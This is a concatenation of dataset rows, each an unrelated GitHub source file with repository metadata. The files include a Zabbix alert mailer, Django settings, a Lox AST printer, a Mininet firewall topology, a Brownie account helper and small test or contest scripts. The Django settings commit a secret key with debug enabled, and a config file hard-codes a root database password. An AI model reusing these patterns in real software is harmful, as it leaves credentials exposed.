data = json.dumps({
"jsonrpc": "2.0",
"method": "trigger.get",
"params": {
"output": [
"triggerid",
"description",
"priority"
],
"filter": {
"value": 1
},
"expandData": "hostname",
"sortfield": "priority",
"sortorder": "DESC",
"expandDescription":1, #expandDescription参数,将trigger的description字段中的宏变量使用实际的数值进行替代;
"selectHosts": ['host'], #在hosts属性中返回触发器所属的主机.
# "selectGroups": ['name'], #在groups属性中返回触发器所属的主机组.
# "skipDependent": 1,
"active": 1, # 只返回所属被监控主机的启用状态的触发器的触发器信息
"monitored": 1, #只返回所属被监控主机的启用状态的触发器,并且监控项在启用状态的触发器信息.
#"only_true": 1, #只返回最近处于问题状态的触发器.
#"min_severity": 1 #只返回严重级别大于或等于给定严重性的触发器.
},
"auth": self.user_login(),
"id": 1
})
request = urllib2.Request(self.url, data)
for key in self.header:
request.add_header(key, self.header[key])
try:
result = urllib2.urlopen(request)
except URLError as e:
print "Error as ", e
else:
response = json.loads(result.read())
result.close()
issues = response['result']
content = ''
hostips = []
alerts = []
if issues:
for line in issues:
#content = content + "%s:%s\r\n" % (line['hosts'], line['description'])
#content = content + "%s : %s\r\n" % (line['hosts'][0]['host'], line['description'])
#vhosts = vhosts + ","+ "%s" % line['hosts'][0]['host']
hostips.append(line['hosts'][0]['host'])
#alerts = alerts + "%s" % line['description']
alerts.append(line['description'])
#return (vhosts,alerts)
#print type(content)
return (hostips,alerts)
def get_html_msg(self):
#issue = z.trigger_get()
hostips,alerts = z.trigger_get()
head ="""<head>
<title>磁盘使用情况</title>
<style type="text/css">
.tftable {font-size:12px;color:#333333;width:100%;border-width: 1px;border-color: #9dcc7a;border-collapse: collapse;}
.tftable th {font-size:12px;background-color:#abd28e;border-width: 1px;padding: 8px;border-style: solid;border-color: #9dcc7a;text-align:left;}
.tftable tr {background-color:#ffffff;}
.tftable td {font-size:12px;border-width: 1px;padding: 8px;border-style: solid;border-color: #9dcc7a;}
.tftable tr:hover {background-color:#ffff99;}
</style>
</head>"""
p = """<p><font face="宋体" size="3"><b>截止到 """ + now_time + """ 主机当前告警信息如下:</b></font></p>"""
table = ''
#htmlmodel = 'aaa'
#table = """<tr><td>/</td><td>"""+ "ceshi" +"""</td><td>16G</td><td>54%</td></tr>"""
for ip,alert in zip(hostips,alerts):
#for alert in alerts:
table = table+ """<tr><td>"""+ ip + """</td><td>"""+ alert +"""</td><td>16G</td><td>54%</td></tr>"""
# print alert
body = p + """
<table class="tftable" border="1">
<tr><th>主机<th>告警<th>可用</th><th>使用率</th></tr> """ + table + """
</table>
</br>"""
htmlmodel = """<html>""" + head + body + """</html>"""
#print("test:\n", list(zip(hostip, alert)))
#print ip,alert
return htmlmodel
if __name__ == "__main__":
    # For each configured server ("url,user,password,subject"), build the
    # HTML alert report and mail it to every recipient.
    for zabbix_addres in zabbix_addresses:
        address, username, password, subject = zabbix_addres.split(',')
        z = ZabbixTools(address=address, username=username, password=password)
        #AuthID = z.user_login()
        #print AuthID
        #content = z.trigger_get()
        content = z.get_html_msg()
        #z.get_html_msg()
        #print(z.get_html_msg())
        zabbix_sendmail.send_mail(mailtolist, subject, content)
        print "Done!"
| [
"word2613182"
] | word2613182 |
a87cf0bc64e224cf6d7d8dda11b39a858f0c6e54 | 0366bccae8841bbf6ecaad70660aae89bb0f6394 | /36_Custom_Modules_4/main.py | 0933dd8cf05ff7f965edf197604b58d88ec52085 | [] | no_license | KobiShashs/Python | 8a5bdddcaef84b455795c5393cbacee5967493f7 | e748973ad0b3e12c5fb87648783531783282832a | refs/heads/master | 2021-04-05T20:18:57.715805 | 2020-04-02T21:51:44 | 2020-04-02T21:51:44 | 248,597,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | from file1 import GreetingCard
from file2 import BirthdayCard
# Demo: build one of each card type and emit its message
# (greeting_msg presumably prints -- defined in file1/file2, not visible here).
card1 = GreetingCard("Kobi","Luther")
card1.greeting_msg()
card2 = BirthdayCard("Kobi","Luther",32)
card2.greeting_msg() | [
"kobi.shasha@gmail.com"
] | kobi.shasha@gmail.com |
080dd226f6ad8c2b5c5bbe796a14e817b05abc0d | 89b2b89d224066b5cd69cfbc38653aff5d6cccdd | /poke_api/poke_api/settings.py | a587be7cd2523af38fc6de621676564f21563b9b | [] | no_license | BashayerNouri/Poke-API | 9e575e90d6af857038dd7fb3854c5549f316af88 | 3f30705a8beef22d7843f65c186b438f0df52ab0 | refs/heads/master | 2022-12-10T14:36:22.129351 | 2019-09-02T06:33:07 | 2019-09-02T06:33:07 | 205,728,570 | 0 | 0 | null | 2022-12-08T06:06:30 | 2019-09-01T20:26:41 | Python | UTF-8 | Python | false | false | 3,154 | py | """
Django settings for poke_api project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repo -- acceptable only for
# local development; production must load it from the environment.
SECRET_KEY = 'c$@%-qkfinj7kjyn9dyf3*$nj078te-5vv^a-=ji&@x1z862t!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'app'  # the project's single local application
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'poke_api.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'poke_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Default development database: file-backed SQLite next to manage.py.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"bashayer_nouri@hotmail.com"
] | bashayer_nouri@hotmail.com |
c06a081f81eecfc07a2cb414e768125e7fd4ef48 | 8bcb2fe177067a506cb841f110a837a2607eb9ef | /lox/ast_printer.py | 6f818e0314db3a1edd4a274c2c382fe25b2aaeec | [] | no_license | faheywf/pylox | efd7c0979bcea8b062476d9255a60d80781821f3 | 2db7fc4fdeeac4f3cd7d075b04c8b485e865d189 | refs/heads/main | 2023-07-19T04:19:53.598152 | 2021-09-04T23:02:45 | 2021-09-04T23:02:45 | 398,118,193 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,112 | py | from stmt import Block, Expression, Function, If, Print, Return, Stmt, StmtVisitor, Var, While
from typing import List
import attr
from expr import Assign, Binary, Call, Expr, Grouping, Literal, Unary, ExprVisitor, Variable
from token_type import TokenType
from tokens import Token
@attr.s(auto_attribs=True)
class AstPrinter(ExprVisitor[str], StmtVisitor[None]):
    """Debug visitor for the Lox AST: expression visitors *return* a
    parenthesized string rendering; statement visitors print to stdout."""
    def print_statements(self, statements: List[Stmt]):
        """Print every statement in order."""
        for statement in statements:
            self.print_statement(statement)
    def print_statement(self, statement: Stmt):
        """Dispatch one statement to its visit_* method."""
        statement.accept(self)
    def print_expr(self, expr: Expr)-> str:
        """Return the string rendering of an expression."""
        return expr.accept(self)
    def parenthesize(self, name: str, *exprs: List[Expr])-> str:
        """Render "(name expr1 expr2 ...)" with each expr recursively printed."""
        s = f"({name}"
        for expr in exprs:
            s += " "
            s += expr.accept(self)
        s += ")"
        return s
    def visit_block_stmt(self, stmt: Block):
        """Print a block and its contained statements."""
        print("(block:")
        for stmt in stmt.statements:
            self.print_statement(stmt)
        print(")")
    def visit_expression_stmt(self, stmt: Expression):
        """Print the rendering of a bare expression statement."""
        print(self.print_expr(stmt.expression))
    def visit_function_stmt(self, stmt: Function):
        """Print a function declaration header and its body."""
        print(f"(fn {stmt.name.lexeme}({', '.join([param.lexeme for param in stmt.params])})")
        self.print_statements(stmt.body)
        print(")")
    def visit_if_stmt(self, stmt: If):
        """Print the then-branch and, when present, the else-branch."""
        print("(if then")
        self.print_statement(stmt.then_branch)
        if stmt.else_branch is not None:
            print("else")
            self.print_statement(stmt.else_branch)
    def visit_print_stmt(self, stmt: Print):
        """Print a Lox print statement."""
        print(self.parenthesize("print", stmt.expression))
    def visit_return_stmt(self, stmt: Return):
        """Print a return statement with its value expression."""
        print(self.parenthesize("return", stmt.value))
    def visit_var_stmt(self, stmt: Var):
        """Print a variable declaration, with "nil" for no initializer."""
        if stmt.initializer is not None:
            print(self.parenthesize(f"var: {stmt.name.lexeme} = ", stmt.initializer))
        else:
            print(f"(var: {stmt.name.lexeme} = nil)")
    def visit_while_stmt(self, stmt: While):
        """Print a while statement: its condition, then its body."""
        print("(while:")
        print(f"\tcondition: {self.print_expr(stmt.condition)}")
        self.print_statement(stmt.body)
        print(")")
    def visit_assign_expr(self, expr: Assign) -> str:
        # Expression visitors must RETURN their rendering (ExprVisitor[str]).
        # The original printed and returned None, so parenthesize() raised
        # TypeError whenever an assignment was nested inside another
        # expression, and statement context printed a stray "None".
        return f"(assign {expr.name.lexeme} = {self.print_expr(expr.value)})"
    def visit_binary_expr(self, expr: Binary) -> str:
        """Render a binary expression as (op left right)."""
        return self.parenthesize(expr.operator.lexeme, expr.left, expr.right)
    def visit_call_expr(self, expr: Call) -> str:
        """Render a call as (call callee arg...)."""
        return self.parenthesize("call", expr.callee, *expr.arguments)
    def visit_grouping_expr(self, expr: Grouping) -> str:
        """Render a parenthesized grouping."""
        return self.parenthesize("group", expr.expression)
    def visit_literal_expr(self, expr: Literal) -> str:
        """Render a literal; Lox's nil is Python's None."""
        if expr.value is None:
            return "nil"
        return str(expr.value)
    def visit_unary_expr(self, expr: Unary) -> str:
        """Render a unary expression as (op operand)."""
        return self.parenthesize(expr.operator.lexeme, expr.right)
    def visit_variable_expr(self, expr: Variable) -> str:
        """Render a variable reference as its name."""
        return expr.name.lexeme
| [
"billy.fahey@gmail.com"
] | billy.fahey@gmail.com |
76b6672f2d8c535fc1f83b0fa31a696341394d51 | 8ad4b4cc8350bf06a7a7678a9fd84b3d00343477 | /mininet/network.py | c95564c01da41bc4640c9e7a11e51fc6231353cd | [] | no_license | jwchae8/SimpleFirewall | 23b333f86d887215a3ddd7d6c6b3f2010c5d8669 | 28942435bb1d7a0c90ecef780366c142a8711cde | refs/heads/master | 2021-01-09T20:11:41.909429 | 2016-06-02T08:18:58 | 2016-06-02T08:18:58 | 60,243,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,259 | py | #!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from mininet.topo import Topo
from mininet.util import quietRun
from mininet.moduledeps import pathCheck
from sys import exit
import os.path
from subprocess import Popen, STDOUT, PIPE
# Address plan for the demo network.
IPBASE = '10.3.0.0/16'      # Mininet ipBase for the whole network
ROOTIP = '10.3.0.100/16'    # NOTE(review): defined but not used below
IPCONFIG = './IP_CONFIG'    # "name ip" pairs, one per line
IP_SETTING={}               # filled by get_ip_setting()
class simpleTopo(Topo):
    "Simple topology for running firewall"
    # Three hosts, each wired to the single switch 'sw0' that plays the
    # firewall role.
    def __init__(self, *args, **kwargs):
        Topo.__init__(self, *args, **kwargs)
        host1 = self.addHost('host1')
        host2 = self.addHost('host2')
        host3 = self.addHost('host3')
        firewall = self.addSwitch('sw0')
        for h in host1, host2, host3:
            self.addLink(h, firewall)
class simpleController(Controller):
    "Simple controller for running firewall"
    def __init__(self, name, inNamespace=False, command='controller', cargs='-v ptcp:%d',
                 cdir=None, ip="127.0.0.1", port=7878, **params):
        # Forward all options to the base class. The original forwarded only
        # name/ip/port, so command/cargs/cdir/inNamespace overrides passed by
        # callers were silently ignored (the defaults happen to match).
        Controller.__init__(self, name, inNamespace=inNamespace, command=command,
                            cargs=cargs, cdir=cdir, ip=ip, port=port, **params)
    def start(self):
        """Launch the controller binary, logging to /tmp/<name>.log."""
        pathCheck(self.command)
        cout = '/tmp/' + self.name + '.log'
        if self.cdir is not None:
            # Was "'cd' + self.cdir": without the space the shell ran a
            # nonexistent command like "cd/some/dir" instead of changing dir.
            self.cmd('cd ' + self.cdir)
        self.cmd(self.command, self.cargs % self.port, '>&', cout, '&')
    def stop(self):
        """Kill the controller process and tear down the node."""
        self.cmd('kill %' + self.command)
        self.terminate()
def set_default_route(host):
    # Point the host's default route at the firewall interface facing it
    # (sw0-eth1/2/3 for host1/2/3, per the IP_CONFIG file), then drop the
    # automatic /8 route so all traffic goes through the firewall.
    info('*** setting default gateway of host %s\n' % host.name)
    if(host.name == 'host1'):
        routerip = IP_SETTING['sw0-eth1']
    elif(host.name == 'host2'):
        routerip = IP_SETTING['sw0-eth2']
    elif(host.name == 'host3'):
        routerip = IP_SETTING['sw0-eth3']
    # NOTE(review): routerip is unbound for any other host name; callers
    # only pass host1..host3 today. (Python 2 print statement below.)
    print host.name, routerip
    host.cmd('route add %s/32 dev %s-eth0' % (routerip, host.name))
    host.cmd('route add default gw %s dev %s-eth0' % (routerip, host.name))
    ips = IP_SETTING[host.name].split(".")
    host.cmd('route del -net %s.0.0.0/8 dev %s-eth0' % (ips[0], host.name))
def get_ip_setting():
try:
with open(IPCONFIG, 'r') as f:
for line in f:
if( len(line.split()) == 0):
break
name, ip = line.split()
print name, ip
IP_SETTING[name] = ip
info( '*** Successfully loaded ip settings for hosts\n %s\n' % IP_SETTING)
except EnvironmentError:
exit("Couldn't load config file for ip addresses, check whether %s exists" % IPCONFIG_FILE)
def simplenet():
    # Build and run the firewall demo: load the IP plan, create the
    # 3-host/1-switch network, assign each host its configured address,
    # install default routes through the firewall, then drop into the CLI.
    get_ip_setting()
    topo = simpleTopo()
    info( '*** Creating network\n' )
    net = Mininet( topo=topo, controller=RemoteController, ipBase=IPBASE )
    net.start()
    host1, host2, host3, firewall = net.get( 'host1', 'host2', 'host3', 'sw0')
    h1intf = host1.defaultIntf()
    h1intf.setIP('%s/8' % IP_SETTING['host1'])
    h2intf = host2.defaultIntf()
    h2intf.setIP('%s/8' % IP_SETTING['host2'])
    h3intf = host3.defaultIntf()
    h3intf.setIP('%s/8' % IP_SETTING['host3'])
    for host in host1, host2, host3:
        set_default_route(host)
    # Interactive CLI blocks until the user exits, then the net is torn down.
    CLI( net )
    net.stop()
if __name__ == '__main__':
    setLogLevel( 'info' )
    # The original called ee323net(), which is not defined anywhere in this
    # file (leftover from a renamed assignment); the constructor above is
    # simplenet().
    simplenet()
| [
"jwchae8@gmail.com"
] | jwchae8@gmail.com |
542aea55b7afd47bdb2ee32372b63431f97c8ebd | 9b54e3d58447e917a238b85891020c392c4ac601 | /acmicpc/2667/2667-dfs.py | 7569bf3af48efbd51118eef2cec76fb0ad56d8d9 | [
"MIT"
] | permissive | love-adela/algorithm-ps | ea0ebcd641a4c309348b389b8618daa83973f4b2 | c92d105d8ad344def001160367115ecf99d81c0d | refs/heads/master | 2023-05-11T03:37:11.750692 | 2023-04-30T17:31:30 | 2023-04-30T17:31:30 | 174,651,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | import sys
# Read one line from stdin with surrounding whitespace stripped.
read = lambda: sys.stdin.readline().strip()
def dfs(matrix, x, y, count):
    """Flood-fill one connected component of 1-cells starting at (x, y).

    Visited cells are zeroed in place; returns the number of cells in the
    component. Relies on the module-level grid size ``n`` for bounds.
    """
    matrix[x][y] = 0
    for step_x, step_y in ((1, 0), (-1, 0), (0, 1), (0, -1)):
        adj_x, adj_y = x + step_x, y + step_y
        if 0 <= adj_x < n and 0 <= adj_y < n and matrix[adj_x][adj_y] == 1:
            count = dfs(matrix, adj_x, adj_y, count + 1)
    return count
# BOJ 2667: read an n x n grid of digits, count the connected components
# of 1-cells, then print the component count followed by each component's
# size in ascending order.
n = int(read())
matrix = [list(map(int, list(read()))) for _ in range(n)]
ans = []
for i in range(n):
    for j in range(n):
        if matrix[i][j] == 1:
            ans.append(dfs(matrix, i, j, 1))
print(len(ans))
for i in sorted(ans):
    print(i)
| [
"love.adelar@gmail.com"
] | love.adelar@gmail.com |
36c6a66118d1c67951248699e65272be8aed77c5 | ddb3656fbacef606ac3cfa53eb74a99be90202cd | /selfdrive/manager/test/test_manager.py | d16a145031df086ac7a79be39e1103c2b3f66f40 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | ErichMoraga/openpilot | f70b353099d3643c9f8d16fb8003811418c95656 | 2f73be29651e34e62eaf18472f9219cea57c177a | refs/heads/812 | 2023-08-02T16:58:57.870050 | 2023-07-20T17:33:41 | 2023-07-20T17:33:41 | 140,953,335 | 58 | 77 | MIT | 2023-07-30T15:33:18 | 2018-07-14T14:41:16 | C | UTF-8 | Python | false | false | 2,019 | py | #!/usr/bin/env python3
import os
import signal
import time
import unittest
import selfdrive.manager.manager as manager
from selfdrive.hardware import EON, TICI, HARDWARE
from selfdrive.manager.process import DaemonProcess
from selfdrive.manager.process_config import managed_processes
# Keep the uploader from touching the network during tests.
os.environ['FAKEUPLOAD'] = "1"
# TODO: make eon fast
MAX_STARTUP_TIME = 30 if EON else 15
# Every enabled non-daemon managed process, minus updated/pandad which are
# excluded from these lifecycle tests.
ALL_PROCESSES = [p.name for p in managed_processes.values() if (type(p) is not DaemonProcess) and p.enabled and (p.name not in ['updated', 'pandad'])]
class TestManager(unittest.TestCase):
  """End-to-end checks for openpilot's process manager."""
  def setUp(self):
    """Force active (non-passive) mode and full power before each test."""
    os.environ['PASSIVE'] = '0'
    HARDWARE.set_power_save(False)
  def tearDown(self):
    """Stop anything the manager started."""
    manager.manager_cleanup()
  def test_manager_prepare(self):
    """manager.main() in prepare-only mode should run to completion."""
    os.environ['PREPAREONLY'] = '1'
    manager.main()
  def test_startup_time(self):
    """Prepare-only startup must stay under MAX_STARTUP_TIME every run."""
    for _ in range(10):
      start = time.monotonic()
      os.environ['PREPAREONLY'] = '1'
      manager.main()
      t = time.monotonic() - start
      assert t < MAX_STARTUP_TIME, f"startup took {t}s, expected <{MAX_STARTUP_TIME}s"
  # ensure all processes exit cleanly
  def test_clean_exit(self):
    """Start every managed process, then verify each is still running and
    exits with an acceptable code when stopped."""
    HARDWARE.set_power_save(False)
    manager.manager_prepare()
    for p in ALL_PROCESSES:
      managed_processes[p].start()
    time.sleep(10)
    for p in reversed(ALL_PROCESSES):
      state = managed_processes[p].get_process_state_msg()
      self.assertTrue(state.running, f"{p} not running")
      exit_code = managed_processes[p].stop(retry=False)
      if (TICI and p in ['ui', 'navd']) or (EON and p == 'logcatd'):
        # TODO: make Qt UI exit gracefully
        continue
      # Make sure the process is actually dead
      managed_processes[p].stop()
      # TODO: interrupted blocking read exits with 1 in cereal. use a more unique return code
      exit_codes = [0, 1]
      if managed_processes[p].sigkill:
        exit_codes = [-signal.SIGKILL]
      assert exit_code in exit_codes, f"{p} died with {exit_code}"
if __name__ == "__main__":
  # Run with the standard unittest CLI runner.
  unittest.main()
| [
"user@comma.ai"
] | user@comma.ai |
bbc1a65be81c8caa800af962fadf22eb932c5f5a | 8387016f05a5b05eec3635800265e1e3bdbd8d14 | /scripts/getAccount.py | c637d2f93ff04b8c806a4ab8aaae659e9ed224f2 | [] | no_license | zbcoding/eth-rock-paper-scissors | 8e37369ce8eb4413714165bce88936c6355162ec | 1234080496b8b9ad96c003e5da70994826964cfa | refs/heads/master | 2023-06-30T11:34:07.754380 | 2021-07-29T03:20:33 | 2021-07-29T03:20:33 | 389,856,441 | 0 | 0 | null | 2021-07-28T04:21:38 | 2021-07-27T05:11:36 | Solidity | UTF-8 | Python | false | false | 533 | py | from brownie import accounts, config, network
# Network names treated as local/forked development chains, where the
# first unlocked ganache-style account can be used directly.
LOCAL_BLOCKCHAIN_ENVIRONMENTS =\
    [
        "mainnet-fork",
        "binance-fork",
        "matic-fork",
        "development",
        "ganache",
        "hardhat",
    ]
def get_account(index=None, id=None):
if index:
return accounts[index]
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
return accounts[0]
if id:
return accounts.load(id)
if network.show_active() in config["networks"]:
return accounts.add(config["wallets"]["from_key"])
return None | [
"uszagb@gmail.com"
] | uszagb@gmail.com |
32e7dcd514ef5655eeb8122a23a32cd7536044b4 | aee3a24b46ec5a3c994f797d010888a4fac4fb14 | /tk1/rosdji_sdk/build/Onboard-SDK-ROS-3.1/dji_sdk_read_cam/catkin_generated/pkg.develspace.context.pc.py | 326a8aec68aa3e1f86849a839e0c87bbd5a08705 | [] | no_license | raj-chinagundi/UAV_Detection_And_Tracking_System | 5a9b94fa299dd0461fa88745e2851675d2484331 | 76fa91a79f2ce9bd0d5e76edc7ef9e407f826d28 | refs/heads/master | 2022-11-17T13:20:33.190025 | 2018-05-19T00:17:10 | 2018-05-19T00:17:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Develspace package context for catkin (values substituted by the CMake template).
CATKIN_PACKAGE_PREFIX = ""
# No include directories were configured, so the list collapses to empty.
PROJECT_PKG_CONFIG_INCLUDE_DIRS = [] if not "" else "".split(';')
# Semicolon-separated catkin deps rendered space-separated (none configured here).
PROJECT_CATKIN_DEPENDS = " ".join("".split(';'))
# Likewise no prefixed pkg-config libraries were configured.
PKG_CONFIG_LIBRARIES_WITH_PREFIX = [] if not "" else "".split(';')
PROJECT_NAME = "dji_sdk_read_cam"
PROJECT_SPACE_DIR = "/home/ubuntu/cc/rosdji_sdk/devel"
PROJECT_VERSION = "0.0.0"
| [
"amosliu19931003@gmail.com"
] | amosliu19931003@gmail.com |
eda73bba7d9036a00f9545a91aef07d96c8bece0 | 6fe8cf62f157672715fae94af6cfae08432d826d | /word_game.py | a0e950b51dfba95ad5a480f8d4927a8f7ad86d40 | [] | no_license | monergeim/python | 20c7268d5edf397c329532f61d759c6fc342ead6 | 2c504fca506a0c38b3b69f48d0e211bb5479ab9d | refs/heads/master | 2021-06-24T23:04:09.295166 | 2021-03-22T21:52:54 | 2021-03-22T21:52:54 | 185,149,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,079 | py | def playHand(hand, wordList, n):
    # Running score accumulated over the whole hand.
    tscore = 0
    # Work on a copy so the caller's hand dict is never mutated in place.
    updhand = hand.copy()
    while calculateHandlen(updhand) > 0:
        # Show every remaining letter, repeated by its multiplicity in the hand.
        print "Current Hand: ",
        for key in updhand:
            if updhand[key] > 0:
                for c in range(updhand[key]):
                    print key,
        i = raw_input("\nEnter word, or a \".\" to indicate that you are finished: ")
        if i == ".": # "." is the sentinel that ends the hand early
            print "Goodbye!",
            break
        else:
            if isValidWord(i, updhand, wordList) == False:
                print "Invalid word, please try again.\n"
            else:
                # Score the word (n is the full hand size used by the bonus
                # rule in getWordScore), add it, and consume its letters.
                wscore = getWordScore(i, n)
                tscore += wscore
                print "\"" + i + "\"" + " earned " + str(wscore) + " points. Total: " + str(tscore) + " points\n"
                updhand = updateHand(updhand, i)
        if calculateHandlen(updhand) == 0:
            print "Run out of letters. ",
            break # the while condition would also end the loop; kept so the message prints first
print "Total score: " + str(tscore) + " points." | [
"noreply@github.com"
] | monergeim.noreply@github.com |
c1b0f7f28604c6d4a41be1979fa72c9cea282093 | 1174123ceab7ac68368e45fbcae7059a8ad34d6a | /tornado_strong/conf/baseConf.py | 3a22a6fab24585819fb19d67d5e36a7cb16d1073 | [] | no_license | sushe2111/strong | a3a72f109adfc765ec1611903f7ad4cc0e3c88be | db9b0c243612c38fd99bccce289d190e5fbc8cb3 | refs/heads/master | 2020-03-25T07:59:12.279495 | 2018-08-13T13:50:18 | 2018-08-13T13:50:18 | 143,591,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | ListenConf = { "host":"10.5.173.248",
"port":8001 }
# MySQL connection parameters for the application's "strong" database.
# NOTE(review): credentials are hard-coded in source.
DatabaseConf = dict(
    host="127.0.0.1",
    port=3366,
    user="root",
    password="123456",
    dbName="strong",
)
# Tornado template and static-asset directories, relative to the project root.
TemplatePath = "resource/template"
StaticPath = "resource/static"
| [
"sushe2111@163.com"
] | sushe2111@163.com |
d41b5616d60c9b00c657ff8693c25553ab9bcc51 | 1ec842f6d220f2c93fcec1cddd5ecf9e1e00880b | /problems/capture_test.py | d04fb75c6195df9026f0def62f48c196fe86563d | [] | no_license | icmeyer/dahlia | 474a61212b10875d3a88aaeec850b38582c4a0b3 | f469c5f2508adae2494bdc72dd4cd9b8a5292cb8 | refs/heads/master | 2020-04-27T15:35:46.913747 | 2019-04-02T03:32:06 | 2019-04-02T03:32:06 | 174,452,258 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | import numpy as np
# Driver script: run a short decay-only calculation and plot the result.
import sys; sys.path.append('..')  # make the project-root modules importable
from main import main_function
from plotting import concentration_plot
# Nuclide identifiers — presumably ZZAAAI codes for U-239, Np-239, Pu-239; TODO confirm.
isotopes = ['922390', '932390', '942390' ]
conc = np.array([1, 1, 1])  # initial concentration per isotope (units defined by main_function)
flux = 0  # zero flux: no transmutation by capture, decay only
years = 2/365  # two days; NOTE(review): relies on Python 3 true division (0 under Python 2)
steps = 80  # number of time steps across the interval
reactor_type = 'fast'
conc_over_time = main_function(isotopes, conc, flux, reactor_type, years, steps)
concentration_plot(isotopes, years, steps, conc_over_time)
| [
"icmeyer@mit.edu"
] | icmeyer@mit.edu |
e9b489fbe7bcefc73ede80c24b77411fb4f7420a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03074/s376018744.py | 6c1333af062b79293eb7a34cac4974521523f39a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | """
keyword: prefix sums (累積和)
"""
import sys
sys.setrecursionlimit(10**6)
n, k = map(int, input().split())
s = input()
nums = []
now = 1 # the digit whose current run is being counted
cnt = 0 # length of the current run of `now`
# Run-length encode s into alternating run lengths, starting with a run of 1s
# (a possibly zero-length one if s begins with '0').
for i in range(n):
    if s[i] == str(now):
        cnt += 1
    else:
        nums.append(cnt)
        now ^= 1 # toggle between 0 and 1
        cnt = 1 # start counting the new run
if cnt != 0:
    nums.append(cnt)
# We want the run list shaped like 1-0-1-0-1: starting AND ending with a 1-run.
# If it ends on a 0-run (even length, 1-0-...-0), append a dummy run.
# Explanation: "1-0-1-0-1" means e.g. zero 1s, two 0s, one 1, ...  Flipping a
# 0-run merges its neighbouring 1-runs into one longer run of 1s; since the
# answer is a run of consecutive 1s, both window ends should be 1-runs.
if len(nums)%2 == 0:
    nums.append(0)
add = 2*k+1
# Build the prefix-sum array over the run lengths.
tot = [0]*(len(nums)+1)
for i in range(len(nums)):
    tot[i+1] = tot[i]+nums[i]
ans = 0
# Windows must start and end on a 1-run, so only even indices start a window;
# a window covers at most 2k+1 runs (k flippable 0-runs plus k+1 1-runs).
for i in range(0, len(nums), 2):
    # Compute the half-open window [left, right) of runs.
    left = i
    right = min(i+add, len(nums))
    tmp = tot[right] - tot[left]
    ans = max(tmp, ans)
print(ans)
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
